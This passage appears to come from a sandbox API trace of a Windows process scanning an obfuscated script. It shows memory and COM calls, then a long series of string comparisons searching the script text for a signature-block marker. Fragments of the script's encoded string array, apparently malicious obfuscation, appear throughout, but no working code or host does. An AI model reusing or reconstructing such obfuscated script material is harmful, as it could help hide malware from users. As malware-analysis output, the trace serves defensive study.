gswqrDrcObbRBLLsONwpHCrMOzw41vw6LDnR3CgEJxw4/DgMKbTcOOTMOVw4BEw5TDtcOPSw==','w4BfwrnCgcO7ImweNx7CiMObw6EdeCXDigHCnzU=','wp/Dl8KawrrDm8KzcQ==','bnwjwpPDm8KqD1F+','B8KyGsOh','K8O1wqnDsiTCnMKtwrYTfQ/CpcK8EUbCuBUuw5nCncOlw4PCsmEpwr7CgcKtEQ==','wq7CksKWw50u','wrPDh8O8WMKvEsOESMOFQMKgXXPDqsKEX8KlIsO2NELDu8KvA8Olw6cOL8K6wqDCukkVS8Oswr06Di/CocOmRsO6wptnwoNtAMKzw6lRw5ofPMOHNhJb") returned 19304
	[0048.212] realloc (_Block=0x37dfd0, _Size=0x96d0) returned 0x37dfd0
	[0048.213] ??2@YAPEAX_K@Z () returned 0x36f0b0
	[0048.213] free (_Block=0x37dfd0) 
	[0048.213] ??3@YAXPEAX@Z () returned 0x165fff01
	[0048.213] ??3@YAXPEAX@Z () returned 0x165fff01
	[0048.213] ??3@YAXPEAX@Z () returned 0x165fff01
	[0048.213] ??3@YAXPEAX@Z () returned 0x165fff01
	[0048.213] ??3@YAXPEAX@Z () returned 0x165fff01
	[0048.213] ??3@YAXPEAX@Z () returned 0x165fff01
	[0048.214] CoUninitialize () 
	[0048.214] ??3@YAXPEAX@Z () returned 0x165fff01
	[0048.214] CloseHandle (hObject=0x140) returned 1
	[0048.214] wcsncmp (_String1="var dogoswoisosfhsdiefgssqda=['wq", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 105
	[0048.214] wcsncmp (_String1="ar dogoswoisosfhsdiefgssqda=['wqt", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0048.214] wcsncmp (_String1="r dogoswoisosfhsdiefgssqda=['wqto", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0048.214] wcsncmp (_String1=" dogoswoisosfhsdiefgssqda=['wqtow", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 19
	[0048.214] wcsncmp (_String1="dogoswoisosfhsdiefgssqda=['wqtowq", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 87
	[0048.214] wcsncmp (_String1="ogoswoisosfhsdiefgssqda=['wqtowqj", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0048.214] wcsncmp (_String1="goswoisosfhsdiefgssqda=['wqtowqjC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0048.214] wcsncmp (_String1="oswoisosfhsdiefgssqda=['wqtowqjCl", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0048.214] wcsncmp (_String1="swoisosfhsdiefgssqda=['wqtowqjClg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0048.214] wcsncmp (_String1="woisosfhsdiefgssqda=['wqtowqjClg=", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0048.214] wcsncmp (_String1="oisosfhsdiefgssqda=['wqtowqjClg==", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0048.214] wcsncmp (_String1="isosfhsdiefgssqda=['wqtowqjClg=='", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 92
	[0048.214] wcsncmp (_String1="sosfhsdiefgssqda=['wqtowqjClg==',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0048.214] wcsncmp (_String1="osfhsdiefgssqda=['wqtowqjClg==','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0048.214] wcsncmp (_String1="sfhsdiefgssqda=['wqtowqjClg==','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0048.214] wcsncmp (_String1="fhsdiefgssqda=['wqtowqjClg==','w5", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 89
	[0048.214] wcsncmp (_String1="hsdiefgssqda=['wqtowqjClg==','w5M", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 91
	[0048.214] wcsncmp (_String1="sdiefgssqda=['wqtowqjClg==','w5Mc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0048.214] wcsncmp (_String1="diefgssqda=['wqtowqjClg==','w5Mcw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 87
	[0048.214] wcsncmp (_String1="iefgssqda=['wqtowqjClg==','w5Mcwr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 92
	[0048.214] wcsncmp (_String1="efgssqda=['wqtowqjClg==','w5Mcwr/", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 88
	[0048.214] wcsncmp (_String1="fgssqda=['wqtowqjClg==','w5Mcwr/D", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 89
	[0048.214] wcsncmp (_String1="gssqda=['wqtowqjClg==','w5Mcwr/Dv", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0048.214] wcsncmp (_String1="ssqda=['wqtowqjClg==','w5Mcwr/Dvc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0048.214] wcsncmp (_String1="sqda=['wqtowqjClg==','w5Mcwr/DvcO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0048.214] wcsncmp (_String1="qda=['wqtowqjClg==','w5Mcwr/DvcOs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 100
	[0048.214] wcsncmp (_String1="da=['wqtowqjClg==','w5Mcwr/DvcOsK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 87
	[0048.214] wcsncmp (_String1="a=['wqtowqjClg==','w5Mcwr/DvcOsK2", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0048.214] wcsncmp (_String1="=['wqtowqjClg==','w5Mcwr/DvcOsK2c", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0048.214] wcsncmp (_String1="['wqtowqjClg==','w5Mcwr/DvcOsK2cu", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 78
	[0048.214] wcsncmp (_String1="'wqtowqjClg==','w5Mcwr/DvcOsK2cuB", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0048.215] wcsncmp (_String1="wqtowqjClg==','w5Mcwr/DvcOsK2cuBQ", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0048.215] wcsncmp (_String1="qtowqjClg==','w5Mcwr/DvcOsK2cuBQ=", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 100
	[0048.215] wcsncmp (_String1="towqjClg==','w5Mcwr/DvcOsK2cuBQ==", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 103
	[0048.215] wcsncmp (_String1="owqjClg==','w5Mcwr/DvcOsK2cuBQ=='", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0048.215] wcsncmp (_String1="wqjClg==','w5Mcwr/DvcOsK2cuBQ==',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0048.215] wcsncmp (_String1="qjClg==','w5Mcwr/DvcOsK2cuBQ==','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 100
	[0048.215] wcsncmp (_String1="jClg==','w5Mcwr/DvcOsK2cuBQ==','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 93
	[0048.215] wcsncmp (_String1="Clg==','w5Mcwr/DvcOsK2cuBQ==','wr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0048.215] wcsncmp (_String1="lg==','w5Mcwr/DvcOsK2cuBQ==','wrv", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 95
	[0048.215] wcsncmp (_String1="g==','w5Mcwr/DvcOsK2cuBQ==','wrvD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0048.215] wcsncmp (_String1="==','w5Mcwr/DvcOsK2cuBQ==','wrvDp", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0048.215] wcsncmp (_String1="=','w5Mcwr/DvcOsK2cuBQ==','wrvDps", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0048.215] wcsncmp (_String1="','w5Mcwr/DvcOsK2cuBQ==','wrvDpsO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0048.215] wcsncmp (_String1=",'w5Mcwr/DvcOsK2cuBQ==','wrvDpsOq", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0048.215] wcsncmp (_String1="'w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0048.215] wcsncmp (_String1="w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0048.215] wcsncmp (_String1="5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8K", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 40
	[0048.215] wcsncmp (_String1="Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8KN", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0048.215] wcsncmp (_String1="cwr/DvcOsK2cuBQ==','wrvDpsOqD8KNw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0048.215] wcsncmp (_String1="wr/DvcOsK2cuBQ==','wrvDpsOqD8KNwp", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0048.215] wcsncmp (_String1="r/DvcOsK2cuBQ==','wrvDpsOqD8KNwpb", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0048.215] wcsncmp (_String1="/DvcOsK2cuBQ==','wrvDpsOqD8KNwpbC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 34
	[0048.215] wcsncmp (_String1="DvcOsK2cuBQ==','wrvDpsOqD8KNwpbCj", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0048.215] wcsncmp (_String1="vcOsK2cuBQ==','wrvDpsOqD8KNwpbCjh", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 105
	[0048.215] wcsncmp (_String1="cOsK2cuBQ==','wrvDpsOqD8KNwpbCjh8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0048.215] wcsncmp (_String1="OsK2cuBQ==','wrvDpsOqD8KNwpbCjh8p", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0048.215] wcsncmp (_String1="sK2cuBQ==','wrvDpsOqD8KNwpbCjh8pa", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0048.215] wcsncmp (_String1="K2cuBQ==','wrvDpsOqD8KNwpbCjh8pas", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0048.215] wcsncmp (_String1="2cuBQ==','wrvDpsOqD8KNwpbCjh8pasK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 37
	[0048.215] wcsncmp (_String1="cuBQ==','wrvDpsOqD8KNwpbCjh8pasKg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0048.215] wcsncmp (_String1="uBQ==','wrvDpsOqD8KNwpbCjh8pasKgV", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 104
	[0048.215] wcsncmp (_String1="BQ==','wrvDpsOqD8KNwpbCjh8pasKgV8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 53
	[0048.215] wcsncmp (_String1="Q==','wrvDpsOqD8KNwpbCjh8pasKgV8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 68
	[0048.215] wcsncmp (_String1="==','wrvDpsOqD8KNwpbCjh8pasKgV8Oz", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0048.216] wcsncmp (_String1="=','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0048.216] wcsncmp (_String1="','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0048.216] wcsncmp (_String1=",'wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1x", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0048.216] wcsncmp (_String1="'wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZ", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0048.216] wcsncmp (_String1="wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0048.216] wcsncmp (_String1="rvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0048.216] wcsncmp (_String1="vDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7j", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 105
	[0048.216] wcsncmp (_String1="DpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7jD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0048.216] wcsncmp (_String1="psOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 99
	[0048.216] wcsncmp (_String1="sOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0048.216] wcsncmp (_String1="OqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0048.216] wcsncmp (_String1="qD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8Ow", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 100
	[0048.216] wcsncmp (_String1="D8KNwpbCjh8pasKgV8Ozb1xZw7jDu8Oww", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0048.216] wcsncmp (_String1="8KNwpbCjh8pasKgV8Ozb1xZw7jDu8Owwr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0048.216] wcsncmp (_String1="KNwpbCjh8pasKgV8Ozb1xZw7jDu8Owwrt", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0048.216] wcsncmp (_String1="NwpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtS", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 65
	[0048.216] wcsncmp (_String1="wpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSX", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0048.216] wcsncmp (_String1="pbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 99
	[0048.216] wcsncmp (_String1="bCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDn", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 85
	[0048.216] wcsncmp (_String1="Cjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0048.216] wcsncmp (_String1="jh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 93
	[0048.216] wcsncmp (_String1="h8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgM", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 91
	[0048.216] wcsncmp (_String1="8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0048.216] wcsncmp (_String1="pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 99
	[0048.216] wcsncmp (_String1="asKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0048.216] wcsncmp (_String1="sKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0048.216] wcsncmp (_String1="KgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0X", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0048.216] wcsncmp (_String1="gV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0048.216] wcsncmp (_String1="V8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 73
	[0048.216] wcsncmp (_String1="8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0048.216] wcsncmp (_String1="Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0048.216] wcsncmp (_String1="zb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OA", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 109
	[0048.217] wcsncmp (_String1="b1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 85
	[0048.217] wcsncmp (_String1="1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw6", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 36
	[0048.217] wcsncmp (_String1="xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 107
	[0048.217] wcsncmp (_String1="Zw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69D", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 77
	[0048.217] wcsncmp (_String1="w7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0048.217] wcsncmp (_String1="7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw7", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 42
	[0048.217] wcsncmp (_String1="jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw79", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 93
	[0048.217] wcsncmp (_String1="Du8OwwrtSXDnDgMOwa0XCr8OAw69Dw79y", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0048.217] wcsncmp (_String1="u8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 104
	[0048.217] wcsncmp (_String1="8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0048.217] wcsncmp (_String1="OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0048.217] wcsncmp (_String1="wwrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0048.217] wcsncmp (_String1="wrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW'", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0048.217] wcsncmp (_String1="rtSXDnDgMOwa0XCr8OAw69Dw79yA8OW',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0048.217] wcsncmp (_String1="tSXDnDgMOwa0XCr8OAw69Dw79yA8OW','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 103
	[0048.217] wcsncmp (_String1="SXDnDgMOwa0XCr8OAw69Dw79yA8OW','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 70
	[0048.217] wcsncmp (_String1="XDnDgMOwa0XCr8OAw69Dw79yA8OW','w5", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 75
	[0048.217] wcsncmp (_String1="DnDgMOwa0XCr8OAw69Dw79yA8OW','w5/", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0048.217] wcsncmp (_String1="nDgMOwa0XCr8OAw69Dw79yA8OW','w5/C", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 97
	[0048.217] wcsncmp (_String1="DgMOwa0XCr8OAw69Dw79yA8OW','w5/Cn", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0048.218] wcsncmp (_String1="gMOwa0XCr8OAw69Dw79yA8OW','w5/Cn8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0048.218] wcsncmp (_String1="MOwa0XCr8OAw69Dw79yA8OW','w5/Cn8K", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0048.218] wcsncmp (_String1="Owa0XCr8OAw69Dw79yA8OW','w5/Cn8KK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0048.218] wcsncmp (_String1="wa0XCr8OAw69Dw79yA8OW','w5/Cn8KKb", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0048.218] wcsncmp (_String1="a0XCr8OAw69Dw79yA8OW','w5/Cn8KKbM", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0048.218] wcsncmp (_String1="0XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 35
	[0048.218] wcsncmp (_String1="XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK5", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 75
	[0048.218] wcsncmp (_String1="Cr8OAw69Dw79yA8OW','w5/Cn8KKbMK5H", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0048.218] wcsncmp (_String1="r8OAw69Dw79yA8OW','w5/Cn8KKbMK5Hs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0048.218] wcsncmp (_String1="8OAw69Dw79yA8OW','w5/Cn8KKbMK5HsO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0048.218] wcsncmp (_String1="OAw69Dw79yA8OW','w5/Cn8KKbMK5HsOe", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0048.218] wcsncmp (_String1="Aw69Dw79yA8OW','w5/Cn8KKbMK5HsOef", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 52
	[0048.218] wcsncmp (_String1="w69Dw79yA8OW','w5/Cn8KKbMK5HsOefs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0048.218] wcsncmp (_String1="69Dw79yA8OW','w5/Cn8KKbMK5HsOefsO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 41
	[0048.218] wcsncmp (_String1="9Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 44
	[0048.218] wcsncmp (_String1="Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg'", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0048.218] wcsncmp (_String1="w79yA8OW','w5/Cn8KKbMK5HsOefsOg',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0048.218] wcsncmp (_String1="79yA8OW','w5/Cn8KKbMK5HsOefsOg','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 42
	[0048.218] wcsncmp (_String1="9yA8OW','w5/Cn8KKbMK5HsOefsOg','M", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 44
	[0048.218] wcsncmp (_String1="yA8OW','w5/Cn8KKbMK5HsOefsOg','ME", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 108
	[0048.218] wcsncmp (_String1="A8OW','w5/Cn8KKbMK5HsOefsOg','MEr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 52
	[0048.218] wcsncmp (_String1="8OW','w5/Cn8KKbMK5HsOefsOg','MErC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0048.218] wcsncmp (_String1="OW','w5/Cn8KKbMK5HsOefsOg','MErCs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0048.218] wcsncmp (_String1="W','w5/Cn8KKbMK5HsOefsOg','MErCsE", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 74
	[0048.218] wcsncmp (_String1="','w5/Cn8KKbMK5HsOefsOg','MErCsEP", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0048.218] wcsncmp (_String1=",'w5/Cn8KKbMK5HsOefsOg','MErCsEPD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0048.218] wcsncmp (_String1="'w5/Cn8KKbMK5HsOefsOg','MErCsEPDh", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0048.218] wcsncmp (_String1="w5/Cn8KKbMK5HsOefsOg','MErCsEPDhc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0048.218] wcsncmp (_String1="5/Cn8KKbMK5HsOefsOg','MErCsEPDhcK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 40
	[0048.218] wcsncmp (_String1="/Cn8KKbMK5HsOefsOg','MErCsEPDhcKa", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 34
	[0048.218] wcsncmp (_String1="Cn8KKbMK5HsOefsOg','MErCsEPDhcKac", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0048.218] wcsncmp (_String1="n8KKbMK5HsOefsOg','MErCsEPDhcKacR", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 97
	[0048.218] wcsncmp (_String1="8KKbMK5HsOefsOg','MErCsEPDhcKacRH", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0048.218] wcsncmp (_String1="KKbMK5HsOefsOg','MErCsEPDhcKacRHC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0048.218] wcsncmp (_String1="KbMK5HsOefsOg','MErCsEPDhcKacRHCm", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0048.219] wcsncmp (_String1="bMK5HsOefsOg','MErCsEPDhcKacRHCmA", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 85
	[0048.219] wcsncmp (_String1="MK5HsOefsOg','MErCsEPDhcKacRHCmA=", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0048.219] wcsncmp (_String1="K5HsOefsOg','MErCsEPDhcKacRHCmA==", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0048.219] wcsncmp (_String1="5HsOefsOg','MErCsEPDhcKacRHCmA=='", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 40
	[0048.219] wcsncmp (_String1="HsOefsOg','MErCsEPDhcKacRHCmA==',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 59
	[0048.219] wcsncmp (_String1="sOefsOg','MErCsEPDhcKacRHCmA==','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0048.219] wcsncmp (_String1="OefsOg','MErCsEPDhcKacRHCmA==','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0048.219] wcsncmp (_String1="efsOg','MErCsEPDhcKacRHCmA==','wo", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 88
	[0048.219] wcsncmp (_String1="fsOg','MErCsEPDhcKacRHCmA==','woz", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 89
	[0048.219] wcsncmp (_String1="sOg','MErCsEPDhcKacRHCmA==','wozD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0048.219] wcsncmp (_String1="Og','MErCsEPDhcKacRHCmA==','wozDh", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0048.219] wcsncmp (_String1="g','MErCsEPDhcKacRHCmA==','wozDhs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0048.219] wcsncmp (_String1="','MErCsEPDhcKacRHCmA==','wozDhsK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0048.219] wcsncmp (_String1=",'MErCsEPDhcKacRHCmA==','wozDhsKi", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0048.219] wcsncmp (_String1="'MErCsEPDhcKacRHCmA==','wozDhsKiw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0048.219] wcsncmp (_String1="MErCsEPDhcKacRHCmA==','wozDhsKiwr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0048.219] wcsncmp (_String1="ErCsEPDhcKacRHCmA==','wozDhsKiwrP", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 56
